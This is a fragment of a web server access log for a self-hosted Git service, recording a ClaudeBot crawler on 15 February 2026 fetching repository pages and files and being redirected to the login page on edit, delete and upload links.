+0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/package.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/html/components" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcUaMinimal/obj" -[15/Feb/2026:09:30:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcUaMinimal/TestService" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/package.json" -[15/Feb/2026:09:30:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/letsencrypt/renewal" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/html/components" -[15/Feb/2026:09:30:19 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/%7Bservice.image%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcUaMinimal/TestService" -[15/Feb/2026:09:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/letsencrypt/renewal" -[15/Feb/2026:09:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj" [Client 216.73.216.188] [Length 9804] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.nuget.cache" [Client 216.73.216.188] [Length 12399] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/database.sqlite" [Client 216.73.216.188] [Length 11095] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/Program.cs?display=rendered" [Client 216.73.216.188] [Length 11115] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" [Client 216.73.216.188] [Length 11493] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.assets.json" [Client 216.73.216.188] [Length 37567] [Gzip 11.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" [Client 216.73.216.188] [Length 11580] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Program.cs" [Client 216.73.216.188] [Length 11557] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa.patch" [Client 216.73.216.188] [Length 1639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:20 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/%7Bitem.href%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa.diff" [Client 216.73.216.188] [Length 1157] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/Program.cs" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/Program.cs?display=source" [Client 216.73.216.188] [Length 17937] [Gzip 5.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/global.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/Program.cs" -[15/Feb/2026:09:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/Program.cs" [Client 216.73.216.188] [Length 9811] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/Program.cs" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/global.json" -[15/Feb/2026:09:30:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/global.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/Program.cs" -[15/Feb/2026:09:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/Program.cs" [Client 216.73.216.188] [Length 903] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/global.json" -[15/Feb/2026:09:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/Program.cs" [Client 216.73.216.188] [Length 6440] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/OpcConnectionTest.csproj" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/OpcConnectionTest.csproj" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/OpcConnectionTest.csproj" -[15/Feb/2026:09:30:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/templates" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/OpcConnectionTest.csproj" -[15/Feb/2026:09:30:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj" -[15/Feb/2026:09:30:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcConnectionTest/obj" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/templates" -[15/Feb/2026:09:30:21 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/css/style.css" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html" -[15/Feb/2026:09:30:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/app" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcConnectionTest/obj" -[15/Feb/2026:09:30:21 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/js/script.js" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/app" -[15/Feb/2026:09:30:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/static" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/assets" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data" -[15/Feb/2026:09:30:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/static" -[15/Feb/2026:09:30:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/assets" -[15/Feb/2026:09:30:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/Program.cs" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj" -[15/Feb/2026:09:30:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/Program.cs" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService" -[15/Feb/2026:09:30:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/services" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/Program.cs" -[15/Feb/2026:09:30:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/components" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/Program.cs" -[15/Feb/2026:09:30:22 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/static/js/app.js" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/services" -[15/Feb/2026:09:30:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/components" -[15/Feb/2026:09:30:22 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/static/css/style.css" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:22 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/index.css" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj" -[15/Feb/2026:09:30:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/requirements.txt" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/update_status.py" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/.TemporaryDocument/claude.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache" [Client 216.73.216.188] [Length 3399] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py" [Client 216.73.216.188] [Length 13952] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py" [Client 216.73.216.188] [Length 10344] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 